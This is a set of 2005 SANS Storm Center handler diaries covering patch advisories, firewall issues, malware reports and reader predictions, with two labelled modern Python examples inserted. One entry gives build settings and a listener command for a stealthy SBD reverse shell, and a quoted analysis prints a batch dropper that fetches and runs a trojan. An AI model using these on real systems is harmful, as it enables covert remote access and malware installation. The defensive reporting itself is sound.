Vulnerable: Windows XP SP 1, XP 64-Bit (Pro, SP1, Professional); Windows 2003 Server with SP1, Windows Services for Unix 2.2, 3.0, and 3.5

Not Affected: Windows 2000 SP3 and SP4; Windows 98, 98 SE; Windows ME

For more information about this vulnerability see Microsoft Knowledge Base Article 896428 (http://support.microsoft.com/kb/896428).
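The disclosure above rides on telnet's in-band option negotiation: a server may ask the client to export its environment variables through the NEW-ENVIRON option (RFC 1572), and a client that answers too generously hands over whatever is in its environment. The Python below is an added example, not code from this diary, from Microsoft's bulletin or from any telnet implementation; the bulletin text above does not name the option, so reading the flaw as a NEW-ENVIRON exchange is this example's assumption. It builds the request a hostile server would send, parses a client's IS reply (including the ESC and doubled-IAC escaping the RFC requires), and flags the variables a defender would not want disclosed. The sample reply and the watch-list are constructed for the example.

```python
"""Telnet NEW-ENVIRON (RFC 1572) request builder and reply parser.
Added example; models the server/client exchange, not any real client's code."""
from __future__ import annotations

# Telnet command bytes (RFC 854) and the NEW-ENVIRON option codes (RFC 1572).
IAC, SB, SE, DO = 255, 250, 240, 253
NEW_ENVIRON = 39
IS, SEND = 0, 1                         # subnegotiation verbs
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3   # tokens inside IS / SEND bodies


def _escape(raw: bytes) -> bytes:
    """Token bytes 0-3 get an ESC in front; a literal 255 is doubled (IAC IAC)."""
    out = bytearray()
    for b in raw:
        if b in (VAR, VALUE, ESC, USERVAR):
            out.append(ESC)
        out.append(b)
        if b == IAC:
            out.append(IAC)
    return bytes(out)


def build_environ_request(names=()) -> bytes:
    """Bytes a server sends: DO NEW-ENVIRON, then a SEND subnegotiation.
    names is a sequence of (VAR|USERVAR, name); an empty sequence is the
    RFC 1572 'send everything you are willing to' form a hostile server uses."""
    out = bytearray([IAC, DO, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, SEND])
    for kind, name in names:
        out.append(kind)
        out += _escape(name.encode("latin-1"))
    out += bytes([IAC, SE])
    return bytes(out)


def build_environ_reply(items) -> bytes:
    """Bytes a client answers: IAC SB NEW-ENVIRON IS (kind name [VALUE value])* IAC SE.
    items: list of (kind_str, name, value_or_None). Used to construct test input."""
    out = bytearray([IAC, SB, NEW_ENVIRON, IS])
    for kind, name, value in items:
        out.append(VAR if kind == "VAR" else USERVAR)
        out += _escape(name.encode("latin-1"))
        if value is not None:
            out.append(VALUE)
            out += _escape(value.encode("latin-1"))
    out += bytes([IAC, SE])
    return bytes(out)


def _subneg_body(data: bytes) -> bytes:
    """Return the body up to IAC SE, collapsing IAC IAC to a single 255."""
    out, i = bytearray(), 0
    while i + 1 < len(data):
        if data[i] == IAC:
            if data[i + 1] == SE:
                return bytes(out)
            if data[i + 1] == IAC:
                out.append(IAC)
                i += 2
                continue
            raise ValueError("unexpected IAC command inside subnegotiation")
        out.append(data[i])
        i += 1
    raise ValueError("unterminated subnegotiation (no IAC SE)")


def parse_environ_reply(data: bytes) -> list:
    """Parse a client's IS reply into [(kind_str, name, value_or_None), ...]."""
    marker = bytes([IAC, SB, NEW_ENVIRON, IS])
    start = data.find(marker)
    if start < 0:
        raise ValueError("no NEW-ENVIRON IS subnegotiation in data")
    body = _subneg_body(data[start + len(marker):])
    items, kind, name, value = [], None, bytearray(), None

    def flush():
        if kind is not None:
            items.append((kind, name.decode("latin-1"),
                          None if value is None else value.decode("latin-1")))

    k = 0
    while k < len(body):
        b = body[k]
        if b == ESC and k + 1 < len(body):
            k += 1                                  # next byte is literal
            (name if value is None else value).append(body[k])
        elif b in (VAR, USERVAR):
            flush()
            kind, name, value = ("VAR" if b == VAR else "USERVAR"), bytearray(), None
        elif b == VALUE and kind is not None:
            value = bytearray()                     # switch from name to value
        elif kind is not None:
            (name if value is None else value).append(b)
        k += 1
    flush()
    return items


# Watch-list chosen for this example: names a telnet server has no business learning.
WATCH = ("USER", "LOGNAME", "USERNAME", "USERDOMAIN", "COMPUTERNAME", "HOME", "PATH")


def sensitive_exports(items, watch=WATCH) -> dict:
    return {name: value for _kind, name, value in items if name.upper() in watch}


# Constructed sample client reply (not a capture).
SAMPLE_ITEMS = [("VAR", "USER", "jdoe"), ("USERVAR", "USERDOMAIN", "CORP"),
                ("VAR", "PRINTER", None)]
SAMPLE_REPLY = build_environ_reply(SAMPLE_ITEMS)

if __name__ == "__main__":
    print("server asks :", build_environ_request().hex(" "))
    disclosed = parse_environ_reply(SAMPLE_REPLY)
    print("client sends:", disclosed)
    print("flagged     :", sensitive_exports(disclosed))
```

The server side of the exchange is nine bytes: DO NEW-ENVIRON followed by an empty SEND, which the RFC defines as a request for every variable the client is willing to export. That is the whole attack surface, so the defensive rule for a client is to answer a SEND only for variables it would knowingly type into a login prompt, and never for the "send everything" form.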

MS05-034 (KB899753) - Cumulative Security Update for ISA Server 2000 (http://www.microsoft.com/technet/security/bulletin/ms05-034.mspx). This patch addresses the following vulnerabilities:

- HTTP Content Header Vulnerability: A vulnerability exists in ISA Server 2000 because of the way that it handles malformed HTTP requests. An attacker could exploit the vulnerability by constructing a malicious HTTP request that could potentially allow the attacker to poison the cache of the affected ISA server. As a result, the attacker could either bypass content restrictions and access content that they would normally not have access to, or cause users to be directed to unexpected content. Additionally, an attacker could use this in combination with a separate cross-site scripting vulnerability to obtain sensitive information such as logon credentials.

- NetBIOS Predefined Filter Vulnerability: An elevation of privilege vulnerability exists in ISA Server 2000 that could allow an attacker who successfully exploited it to create a NetBIOS connection with an ISA Server by utilizing the NetBIOS (all) predefined packet filter. The attacker would be limited to services that use the NetBIOS protocol running on the affected ISA Server.

Vulnerable: Microsoft ISA Server 2000 SP 2; Microsoft Small Business Server 2000 and 2003 Premium (which include ISA Server)

Not Affected: Microsoft ISA Server 2004 Standard and Enterprise

For more information about this vulnerability see Microsoft Knowledge Base Article 899753 (http://support.microsoft.com/kb/899753).

Bulletin Updates

- : Bulletin updated to announce the availability of an updated package for .NET Framework 1.0 Service Pack 3 for the following operating system versions: (887998) Windows XP Tablet PC Edition and Windows XP Media Center Edition.

: Microsoft updated this bulletin today to advise customers that a revised version of the security update is available. We recommend installing this revised security update even if you have installed the previous version.

: Updated technical information in the FAQ with additional details around cluster installation and to advise of an updated KillPwd utility.

MS Patches Reset Settings in Program Defaults?

It appears that when you install patches, the settings in "Set Program Access and Defaults" (underneath Add/Remove Programs) in XP SP2 Professional get reset to the defaults (i.e. Microsoft products). For instance, in the "Other" section, I had set my default web browser to Firefox and my default media player to iTunes, and patching undid that. Has anyone else experienced this?


John Bambenek

bambenek -at- gmail.com
Published: 2005-06-13

iframeDOLLARS.biz redux ; P2P == Prepare to Patch ; I'm the MAP ; Remote Malware Acquisition

I thought a few things were news worthy today, that and after a recent conversation with another Incident Responder interested in improved malware recovery techniques I wanted to share a method that I've been happily using for a while now in performing remote host analysis for the identification and retrieval of malicious code samples.

iframeDOLLARS.biz redux

Holy smokes, the iframeDOLLARS business practice is back up and running at (www.iframedollars.biz) and (bestcounter.biz) We've also received reports of malicious hosting at I personally (NOT SANS!!!) highly recommend these domains and IPs for blackholing on your networks. While you're at it, if you manage large proxies and find new hits for iframeDOLLARS exploits, we'd like to hear about them.

(p2p) It's free, so Prepare to Patch

It's Fr^h^hMonday the 13th, so p2p. I'm not talking about installing spyware- and adware-riddled software that tempts you to violate multiple laws by gaining access to free warez/music/etc... I'm talking about "p2p" as in "Prepare to Patch". Be forewarned that there are more than a few patches of significance that will become available for an operating system near you starting Tuesday the 14th. Oh yeah, by the way, these patch downloads are also free!

The SANS handlers have received a vendor notice from ISS of a potential incompatibility with specific BlackICE product versions running on Windows 2000 that may conflict with a revision of a Microsoft patch scheduled for release on June 14th. BlackICE users on Windows 2000, Please make sure your engine is running BlackICE PC/Server Protection version "cnr".

The MAP - and this one is not in Dora the Explorer's backpack

The availability of the from iDefense.com was posted in several forums last week. I'm intrigued and will be checking it out soon. Even though I have a strong preference for doing this type of work on a unix platform, based upon a quick read of included tool features there looks to be a few native Windows analysis functions that I wouldn't know how to replicate in the linux world.

Remote Malware Acquisition with SBD

I have an ongoing need to investigate and assist other investigators with remote machines to identify malware as well as retrieve suspicious/obvious samples. I do not often require full GUI console access to get to the root of the problem, so talking someone through the installation of VNC or the configuration of terminal services can be a tedious experience. I have found that SBD, which is available from http://tigerteam.se/dl/sbd/, gave me pretty much all I needed: just a simple encrypted command line reverse shell delivered to a host of your choosing. SBD, aka ShadowInteger's Backdoor (and no, it's not really as evil as it sounds), supports compilation on both unix and win32 (cygwin/mingw) environments. Several AntiVirus vendors have started flagging this tool as a PUP, a Potentially Unwanted Program. True enough; most security tools are double-edged swords.

Download the source for yourself. I still use sbd-1.33, it's certainly stable enough for my purposes. A shortcut to creating your custom sbd binary follows:

I recommend making the following modifications to sbd.h header define variables suitable for your environment.

#define HOST "IP.or.host.name" // Your sbd binary will connect back to this.
#define PORT 10001 // The port your binary will attempt to connect to.
#define EXECPROG "cmd.exe" // SBD will send you an encrypted shell
#define ENCRYPTION 1 // well, not encrypted if you don't set this variable
#define SHARED_SECRET "Sup3rDup3rp455w0rd" // This is my personal AES shared secret, NOT!
#define RESPAWN_ENABLED 1 // If you accidentally drop the reverse shell
#define RESPAWN_INTERVAL 120 // sbd counts this in seconds, so it retries every two minutes.
#define QUIET 1
#define VERBOSE 0
#define DAEMONIZE 1

To build your Windows binary, execute the following from a Cygwin Bash shell

$ make win32bg CFLAGS=-DSTEALTH

If all goes well your new SBD binary is now hardcoded to perform a specific action by default which is to connect back to your host and present you with a cmd.exe shell.

To receive a connection from a suspect host, make sure you're running an appropriately configured sbd binary. The same binary can be used as sending client or receiving server.

On my linux host using a linux SBD binary of course, I first start a typescripting session so that I will have a log of everything I've done remotely, then I execute the following:

sbd -k Sup3rDup3rp455w0rd -l -p 10001 -r 0

Once you have your sbd listener waiting you can provide phone/email/IM/pager instructions to your remote workstation user to grab and execute your custom sbd binary. The remote user should not have to provide any fancy command line arguments, and while it's bad security form they can even execute directly from your webpage. I leave a web server and tftp server available for tool retrieval and tftp uploads enabled so I can push malware samples back to myself.

Once the remote user executes your custom SBD binary you should have a command shell appear in the window you just executed your sbd listener in. Yay, let the healing begin.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

At this point your creativity as an Incident Responder is the only limit.

TFTP retrieval of tools.

Directory listings sorted by date 'dir /od' (oldest first; 'dir /o-d' puts the newest first)

Hidden file listings 'dir /od /ah'

Registry run key listing using 'reg' (XP)

TFTP upload of malicious samples.

To bring this diary to a close, I leave it as a challenge for another handler to present you with an IR SBD based methodology that utilizes only the tools available to the default unmodified native operating system vs. a methodology that leverages the retrieval of supporting analysis tools. If the challenge is not accepted, I'll share my process.

Build it. Use it. Finally, Let us know how you use it.

Thanks, and we'll leave the light on.

William Salusky
wsalusky at gmail dot com
Handler on Duty (heh heh, Duty)


Published: 2005-06-11

AUP/Terms of Service Agreements

Reading AUP's on a slow day

"What do you mean I violated my AUP? I don't *have* an AUP! ... do I? ..."

Since it is a *very* slow day, I thought I would take the opportunity to remind all of our readers to take a minute and review their AUP. Otherwise, you may wind up without your internet one day, without a lot of explanation.

"What is an AUP" you ask? An AUP, or Acceptable Use Policy (also called "Terms of Service"), is essentially the set of rules of behavior to which an individual or company is bound when they sign up with an ISP for internet connectivity. Even Google has an AUP, which applies to everyone who uses Google to search for whatever their heart desires.

Some of the more common ones you may be interested in....

Earthlink - Careful how much you post...

"EarthLink considers "multiposting" to 10 or more groups within a two week sliding window to be excessive. EarthLink servers currently limit the number of allowable "cross-posts" to 9"


Verio - Using your home network for some pen testing....

"any activity that might be used as a precursor to an attempted system penetration (i.e. port scan, stealth scan, or other information gathering activity)"


Tony Carothers

Handler on Duty

tony d0t carothers at gmail d0t com


Published: 2005-06-10

Mailbag Question, ZoneAlarm failure update, Michael Jackson Malware analysis, More on HIDS, IM Name Game submissions

A Question for System Profilers

A contributor has asked if anyone has information related to scans that they have received from remote systems with the following port profile:

22/tcp open ssh?
53/tcp open domain ISC Bind 9.2.1
6703/tcp open unknown
6721/tcp open unknown
6722/tcp open unknown
6723/tcp open unknown
6737/tcp open unknown
6750/tcp open unknown
6760/tcp open unknown
6767/tcp open unknown

"Please note the text returned from connections to port 22: "I wish I was special". There appears to be no actual sshd daemon listening. A scan of the high 6700 ports returns no data from any of the open ports."

ZoneAlarm Failure Update

We have been contacted by ZoneLabs (a Check Point company) about yesterday's Diary entry and have been asked to post a link to their statement. According to a follow-up response to a question posed to ZoneLabs:

"Users using the ProgramAdvisor service in Automatic mode were potentially affected.

No systems were exposed as a result of the issue.

The firewall would not go into 'deny all', but would continue to enforce the current policy at the time the error occurred."
ZoneLabs -
Thanks for the answer!

Michael Jackson Suicide Note Malware

Several AV vendors are reporting the spreading of an email with a clickable link supposedly pointing to additional information on a Michael Jackson suicide note. Clicking the link takes the victim to a web site that installs malware using exploits customized for different browsers. The Storm Center received an excellent analysis of the malware from Matt Corothers and he has allowed us to reprint it here. Thanks, Matt!

"The server at abcnews-go.com was distributing malware via browser exploits (including Firefox). When you load the site, you get a fake "site is currently suspended" message, and a php script included as javascript checks your ip and browser. The first time you hit the site from a given ip, the php script then outputs some javascript that forwards you to the exploit page for your browser. Subsequent hits return nothing.

The exploit creates this batch file which downloads and executes a trojan via ftp from the same ip:

echo open>c:\1.dat
echo ls>>c:\1.dat
echo binary>>c:\1.dat
echo recv 1.exe c:\1.exe>>c:\1.dat
echo quit>>c:\1.dat
ftp -n -s:c:\1.dat -A
start /min c:\1.exe
del c:\1.dat


1.exe periodically posts information about the infected computer to a cgi script at nugget-sales.com, currently

The CGI responds with commands, the first of which is for the trojan to update itself using http to rplay93.exe appears to be a different version of the same malware. It also periodically posts to nugget-sales.com. Other than the update command, I'm not really sure what the trojan is supposed to be doing. Part of the cgi response appears to be a command to load www.microsoft.com, which it does occasionally.

Some of the IP addresses and links are still alive at the time of this writing, so exercise caution if your curiosity gets the best of you. The malware may also reappear at other sites in the future. Additional details are available on most major AV vendor sites.

Opinion - More on HIDS

Configuring HIDS agents for important "event" reporting is always an interesting subject; one would hope that more than one set of eyes is involved in selecting the events to be reported. As noted in "The Tao of Network Security Monitoring: Beyond Intrusion Detection", "the alert is only the beginning of the quest, not the end." Success here depends, of course, on the agent's capabilities/configurability and on the range of experience of the "team" selecting and classifying the importance of the events, the events that matter for the environment where the agents are deployed.

Over the _years_ I've found that IntersectAlliance's Snare products for *nix, Windows and some Microsoft applications are as configurable as they get. I've also read other public posts about this product's performance. Extending this opinion, a contributor recently sent in a link to a recent MS document that has a basic list of events to consider. I regret I don't have the contributor's name anymore so I can publicly thank them for sending in the link, but "Thanks!".

So ... I'm soliciting Diary contributor suggestions for other lists of *nix events that should be considered for logging with *nix or MS HIDS agents. I'll post the list in my Diary next week. Anyone with product-specific precompiled lists of "important" events logged is also invited to share (within the confines of your license!).


are "Free, Open-Source, audit and event log agent software for a (HUGE/pn) variety of operating systems, and applications." Home users might consider giving the a whirl too, it's a "A basic, free, Open-Source, centralised audit and eventlog collection tool for Windows" and anything else that can export to syslog.

Microsoft's document is The Security Monitoring and Attack Detection Planning Guide (http://www.microsoft.com/downloads/details.aspx?FamilyID=95a85136-f08f-4b20-942f-dc9ce56bcd1a).

More on Snare at the SANS Reading Room.

The Tao of Network Security Monitoring Beyond Intrusion Detection By Richard Bejtlich, available online at

Other related resources are at
, read the tool's PDFs that come with the download.

IM attack Name Game Responses

, "It's not meat, but it works: LIMA - layered instant message

Anonymous said "Not bologna but wiener. There was an old commercial jingle, "I wish I were an Oscar Mayer wiener ..." Maybe wiener-job or wiener-work, etc. Thanks for all the great work you do."

Robert Darin said "Simple: WIMP - Windows IM parasite. Windows because only Microsoft based platforms are as risk to this type of cheap and pathetic attack."

Rhen Alderman suggested "phim" as an acronym for a ****** Instant Messenger.

Another anonymous suggestion - "You could always go with Wiener--as in, 'you've been wienered,' for Oscar-family

And Jason Martin suggested "Instant Messaging --> In-Stunt Messaging. Or even In-Stunt Messa-Gang.".

Thanks everyone!

Patrick Nolan, with grateful assists from other Handlers and Contributors.
Published: 2005-06-09

ZoneAlarm shutdown problem update, MS Black Tuesday

ZoneAlarm Update

An update report from a Diary contributor says: "The affected version of ZoneAlarm was The newer fixed version of ZoneAlarm is (hey it looks the same!) Why they couldn't just use that fourth numbering component and change .000 to .001 is a mystery. If you download the file, right-click on it and look at the properties, the broken version of ZoneAlarm Pro will be file version '' and has the description 'ZoneAlarm Pro-1025-English'. The newer version will have a description of 'ZoneAlarm Pro-1043-English'. For the freeware ZoneAlarm, the newest update available to download has a description of 'ZoneAlarm-1013-English'. I don't know what the description value was for the affected version."
Thanks for the contribution!

Earlier Diary Entries

ZoneAlarm Problems

ZoneAlarm (a Check Point company) users were lighting up ZoneLabs user forums yesterday with reports of the firewall shutting down. ZoneLabs issued an advisory.

"Vulnerable" MS OS and application list

See "Microsoft June Advance Notification Unspecified Security Vulnerabilities"

The MSRC Blog says MS will release "7 bulletins affecting Windows. The maximum severity rating for these security updates is Critical and some will require a restart.

1 bulletin affecting Windows and Microsoft Services for UNIX. The maximum severity rating for this is Moderate and may require a restart.

1 bulletin affecting Microsoft Exchange. The maximum severity rating for this security update is Important and it will not require a restart.

1 bulletin affecting Microsoft Internet Security and Acceleration (ISA) Server and Small Business Server. The maximum severity rating for these security updates is Moderate and may require a restart."

And Juha-Matti adds another pointer to what's coming with a pointer to:
CAN-2005-1907 (under review)
"The ISA Firewall service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (Wspsrv.exe crash) via a large amount of SecureNAT network traffic."
Thanks Juha-Matti!

The Co$t of Security

Over at TheRegister, in the article "Symantec ask court to rule Hotbar.com as adware", it says "In other spyware-related news, Dell said that better customer awareness and sales of security software subscriptions had halved the number of support calls it was receiving about spyware-related problems over the last year."


Cisco - Cisco 802.1x Voice-Enabled Interfaces Allow Anonymous Voice VLAN Access

Cisco has released a Cisco Security Notice in response to an advisory released by FishNet Security on June 8, 2005 entitled "Cisco 802.1x Voice-Enabled Interfaces Allow Anonymous Voice VLAN Access"



Published: 2005-06-08

ASN.1 vuln, Windows integrity checker

More reports of RBOT using ASN.1 vuln

We are getting more and more reports of the use of the ASN.1 vuln in an rbot variant. This is using one of the ASN.1 vulns patched by MS04-007. The exploit is borrowed from an existing proof of concept. For more discussion see this article on the vuln-

(thanks Dave)

This was previously mentioned in the diary on the 3rd of June as possibly rbot attacking IIS' authentication methods

This is the report from VirusTotal for the samples we've seen:

Antivirus Version Update Result
AntiVir 06.05.2005 no virus found
AVG 718 06.04.2005 no virus found
Avira 06.05.2005 no virus found
BitDefender 7.0 06.05.2005 Backdoor.SDBot.0B1CDAF0
ClamAV devel-20050501 06.05.2005 no virus found
DrWeb 4.32b 06.05.2005 no virus found
eTrust-Iris 06.05.2005 Win32/RBot.121504!Worm
eTrust-Vet 06.03.2005 no virus found
Fortinet 06.04.2005 suspicious
Ikarus 2.32 06.03.2005 IM-Worm.Win32.Sumom.C
Kaspersky 06.06.2005 Backdoor.Win32.Rbot.gen
McAfee 4506 06.03.2005 no virus found
NOD32v2 1.1129 06.05.2005 Win32/Rbot
Norman 5.70.10 06.04.2005 W32/MEWpacked.gen
Panda 8.02.00 06.05.2005 W32/Gaobot.HEG.worm
Sybari 7.5.1314 06.06.2005 Worm.RBot.BGM
Symantec 8.0 06.05.2005 W32.Spybot.Worm
TheHacker 5.8-3.0 06.06.2005 no virus found
VBA32 3.10.3 06.05.2005 Backdoor.Win32.Rbot.gen

Windows Integrity tracking

Having just suffered from a violent system crash, I'm in the perfect place to start tracking everything that is done to my system. My concern is that recently I ended up having to do multiple rebuilds not because I knew my system was compromised but because I couldn't be confident that it wasn't. After running all the rootkit detection tools, AV tools, spyware/adware tools, forensic tools, etc.. that I could find, I still didn't have complete confidence.

So with my nice clean build, I'm setting a goal of having complete tracking of the state of the system. I want to know anything that executes and anything it calls and when anything of that sort changes. I started by looking around for integrity tools and trying to choose one that would make it easy to track all this (cause I'm going to get a lot of noise, I realize that).

Before you ask, yes, I've hardened the build. Yes, I use tools like InControl, the application control built into my personal firewall, WinInterrogator, WinAudit, BHO Demon, AdAware, Spybot S&D, two different AV products, Rootkit Revealer, everything Sysinternals makes, and those are just the ones that come to mind without trying. I've tried everything I can find to track this sort of stuff. None of them give me the level of visibility and assurance I want & need. So, I've been brought to this.

At the moment, the ones I'm trying are Xintegrity Professional and Osiris. Xintegrity offers a free trial and has a clean interface. It seems to crash on occasion but I'm putting up with that for now. Osiris is free and (as far as I know) only offers a command-line interface, but that's fine. I've started by building a baseline of the entire system. As I add new software, I'll update the baseline to include the freshly installed software. I'm in the process of identifying the files that are going to change (legitimately) frequently. Once I have those, I'll likely remove most of them from the checks.

Why would I do this? Why not trust my AV software, my personal firewall, my anti-spyware tools, my bootable forensics distro, and everything else? Simply because none of them offer the simple confidence that I want: that I know everything that is going to execute on my system, be it BHO, DLL, EXE or Firefox extension, and that I will know when any of them or any of their configurations change. I don't trust my OS, I don't trust any of the software running on it (if the recent months have shown us anything, it is that Firefox, as it gains popularity, has at least as many vulnerabilities showing up as IE does), and our tools for dealing with this just seem to stink (or at least fall short of the goal by a good distance).

What do y'all do to help deal with this issue? If there is an interest, I'll post updates in the diary from time to time.
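To make concrete what a file-integrity baseline of the kind described above actually buys you, here is an added example in Python. It is not code from Osiris, Xintegrity or the diary author's setup: it hashes every regular file under a root, persists the baseline, skips paths you have decided change legitimately, and diffs a later scan. The directory tree and the "attacker" changes in demo() are constructed inline; the exclusion pattern and the "timestomped" heuristic (content changed while the mtime did not move) are this example's choices.

```python
"""File-integrity baseline and diff. Added example, not Osiris/Xintegrity code."""
from __future__ import annotations
import fnmatch
import hashlib
import json
import os
import shutil
import stat
import tempfile

FIELDS = ("sha256", "size", "mode", "mtime")


def _sha256(path: str, block: int = 1 << 16) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(block), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str, exclude=()) -> dict:
    """Record sha256, size, mode and mtime for every regular file under root.
    exclude: glob patterns on the path relative to root ('logs/*', '*.tmp')
    for files known to change legitimately. Symlinks and special files are
    skipped (lstat) so a link swap cannot show up as 'unchanged'."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for fn in sorted(filenames):
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if any(fnmatch.fnmatch(rel, pat) for pat in exclude):
                continue
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            baseline[rel] = {"sha256": _sha256(full), "size": st.st_size,
                             "mode": stat.S_IMODE(st.st_mode),
                             "mtime": int(st.st_mtime)}
    return baseline


def save_baseline(baseline: dict, path: str) -> None:
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path) as f:
        return json.load(f)


def compare(old: dict, new: dict) -> dict:
    """Diff two baselines. 'changed' maps path -> fields that differ;
    'timestomped' lists content changes whose mtime did not move, which is
    what an attacker who resets timestamps leaves behind (example heuristic)."""
    changed, timestomped = {}, []
    for rel in sorted(set(old) & set(new)):
        diffs = [k for k in FIELDS if old[rel][k] != new[rel][k]]
        if diffs:
            changed[rel] = diffs
            if "sha256" in diffs and "mtime" not in diffs:
                timestomped.append(rel)
    return {"added": sorted(set(new) - set(old)),
            "removed": sorted(set(old) - set(new)),
            "changed": changed, "timestomped": timestomped}


def _write(root: str, rel: str, data: bytes) -> None:
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo() -> dict:
    """Constructed scenario in a temp dir: a binary replaced (same size, old
    mtime restored), a DLL dropped, and a log excluded as expected noise."""
    root = tempfile.mkdtemp()
    try:
        exclude = ("logs/*", "baseline.json")
        _write(root, "bin/svc.exe", b"MZ original service")
        _write(root, "bin/helper.dll", b"MZ helper")
        _write(root, "logs/app.log", b"line1\n")
        base_file = os.path.join(root, "baseline.json")
        save_baseline(build_baseline(root, exclude), base_file)
        # 'attacker': overwrite in place, put the timestamp back, drop a file
        target = os.path.join(root, "bin", "svc.exe")
        st = os.stat(target)
        _write(root, "bin/svc.exe", b"MZ trojaned service")
        os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))
        _write(root, "bin/evil.dll", b"MZ new")
        _write(root, "logs/app.log", b"line1\nline2\n")   # legitimate churn
        return compare(load_baseline(base_file), build_baseline(root, exclude))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Two design points worth noting. The baseline file must live somewhere the thing you are baselining cannot modify (a read-only medium or another host); a baseline stored on the monitored disk is only as trustworthy as the disk. And a file baseline covers exactly the goal of knowing which EXE, DLL and extension files changed; BHOs and run keys are registry-hosted configuration, so reaching the "anything that executes" goal stated above needs a registry baseline beside the file one.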

Apple Vulnerability

Finally, Apple has released patches for a whole slew of vulnerabilities:

AFP Server
CVE-ID: CAN-2005-1721
AFP Server
CVE-ID: CAN-2005-1720
CVE-ID: CAN-2005-1333
CVE-ID: CAN-2005-1722
CVE-ID: CAN-2005-1726
CVE-ID: CAN-2005-1725
CVE-ID: CAN-2005-1723
MCX Client
CVE-ID: CAN-2005-1728
CVE-ID: CAN-2005-1724
CVE-ID: CAN-2005-0524, CAN-2005-0525, CAN-2005-1042, CAN-2005-1043
CVE-ID: CAN-2005-1343

Security Update 2005-006 may be obtained from the Software Update
pane in System Preferences, or Apple's Software Downloads web site:


Published: 2005-06-07

Welcome New Users; SANSFIRE; Webcast Date Change; Emerging Threats

Dear Diary,

Rather than doing one summary at the end of today, I'm going to start the diary early then update it a few times during the day.

Welcome New Users

A bunch of new readers joined us over the past few weeks and I want to thank you for stopping by. The SANS Internet Storm Center depends entirely on volunteer effort to keep it running and in the roughly six years we've been around I can say that the thousands of folks who have helped us are all greatly appreciated! Additionally, we need to express our thanks to for providing the servers, rack space, and connectivity. Whether you are a regular reader or new to the group, if you want to know more about how to participate, the are on our sister site at DShield. We can always use more sensor operators, and if you like trying your hand at incident handling then please sign up for one of our discussion lists. The port pages could also use some additional thoughts and comments if you have any to add.


SANSFIRE is next week in Atlanta and many of us will be there. It's not too late to register if you haven't done so. If you are at the conference, please be sure to say hello and don't forget to come listen to Johannes' presentation on Monday night as he tells us all about the magic behind the curtains at the Storm Center. I'll be teaching Security 401 as well as giving a talk on Tuesday morning. Hope to see you there!

Webcast Date Change

The SANS ISC webcast was scheduled for tomorrow. We have moved it to next week so that it follows the greatly anticipated monthly Microsoft security bulletin release. When we were setting up the webcast dates several months ago we goofed and scheduled June's webcast a week too early. Please join us next week!

Emerging Threats

As many of you know, worms, viruses, web defacements and even botnets are what we might call "last century" threats. What are we going to be facing in the coming years? The SANS ISC is interested in your ideas, so if you have time today drop us a
with your thoughts. Please don't send us a book, just a few lines will do. We'll include the best ones in the diary today.

Here's a few that have arrived:

David says, "Instead of hijacking a system to use the disk space and setup detectable FTP servers, [attackers] may end up harvesting all of the documents from the system in hopes of gaining financial or personal information for identity theft."

John suggests, "As direct electronic invoicing becomes more popular, criminals will try to leverage poor implementations of Web Services to submit fraudulent invoices for payment. Agencies that have done away with support staff necessary for manual invoice processing will pay dearly."

Greg offers, "With the developing trends in botnets and denial of service with them, I'm willing to bet that we'll see more frequent use of ddos for hire and malware distribution by zombie pcs. It also would be a shock to see an adaptive botnet..that can change and adapt to discovery on the fly..shutting down discovered nodes and such."

Steve tells us, "I believe that the real threat that's only beginning to surface is internet extortion. What means by which it will happen is hard to say, but it's an increasing threat. I think we're on the brink of seeing widespread extortion happening where files will be "kidnapped", and a ransom note will be left in their places for the user to follow if they want their precious files back." (note from the HOD - this is already happening!)

Tom thinks that these are possible emerging threats: "VoIP hacks (with social engineering and Caller ID spoofing people will give up a lot of data), Hacker "Mafias" (not just small scale people writing viruses because they can - distributed networks of hackers organizing criminal actions like stealing credit information, etc.), attacks on mobile devices (security just really is not a concern for many mobile companies)."

Alex scares us with, "My thought is that we'll see new types of Malware that are able to correlate personal data about a selected individual that it promiscuously finds on the web. The implications of this range from the obvious identity theft to much more sophisticated phishing scams and even password compromise by building very specific custom dictionaries for attack. A 50k+ botnet is great for DDoS, but it has other uses for its massive computing power and connectivity; namely a huge web spidering and correlational tool for this type of attack."

Damian believes that, "one of the emerging trends could be cryptovirology. I believe it could have a huge impact if a nasty crypto worm is developed and it could exploit some new vulnerabilities. In fact I try not to think about it very often ... otherwise I couldn't sleep."

CE's crystal ball says, "Two things come to mind regarding emerging threats: 1) Infection, or at least increased attempts at infecting, of popular sites (like the recent MSN News Korea story) will increase due to the lure of large amounts of victims who trust well-known sites. 2) False information that is presented in ways that a majority of readers, and possibly many experts, wouldn't doubt. This can be used for fraud, social engineering, etc. It will move beyond phishing email and stock scams into possibly more mainstream mediums."

Gary says he is "concerned at the potential for targeted malware. Whereas today's viruses and worms are fairly indiscriminate, I foresee the emergence of malware that specifically targets a given individual, organization or some other distinctive target."

Christian muses that, "one threat will remain for ever .. that's osi layer 8. There will always be suboptimally trained users, administrators, coders or managers that copy /etc/shadow to webserver root." (note from the HOD - I like to call this the "carbon layer" of the OSI model.)

Matt predicts three major trends in the coming year: "The death spiral of signature-based virus detection ... a major increase in wireless network attacks, particularly man-in-the-middle spoofing/theft ... [and] a concentrated, coordinated effort to improve public understanding of basic security issues by both private and government agencies."

Eric is concerned about "completely 'blended' and adaptive threats funded by money that is coerced/stolen electronically. Threats that morph from one form to another depending on how a system is set up to counteract attacks are a real possibility. With more 'holes' being discovered I think it is wise to believe that the development of adaptive threats with blended capabilities is going to be a huge problem."

